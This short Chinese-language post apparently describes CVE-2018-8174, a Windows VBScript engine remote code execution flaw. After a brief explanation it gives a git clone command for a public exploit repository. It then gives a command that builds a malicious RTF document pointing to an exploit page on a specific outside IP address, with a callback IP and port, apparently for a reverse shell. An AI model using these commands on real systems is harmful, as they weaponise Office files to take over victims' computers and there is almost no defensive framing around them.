CVE-2018-8174 是 Windows VBscript Engine 代码执行漏洞。
微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174
由于 VBscript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBscript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码
这里是先创建的CVE文件
克隆的命令:git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
python CVE-2018-8174.py -u http://47.103.97.200/exploit.html -o msf.rtf -i 47.103.97.200 -p 19132
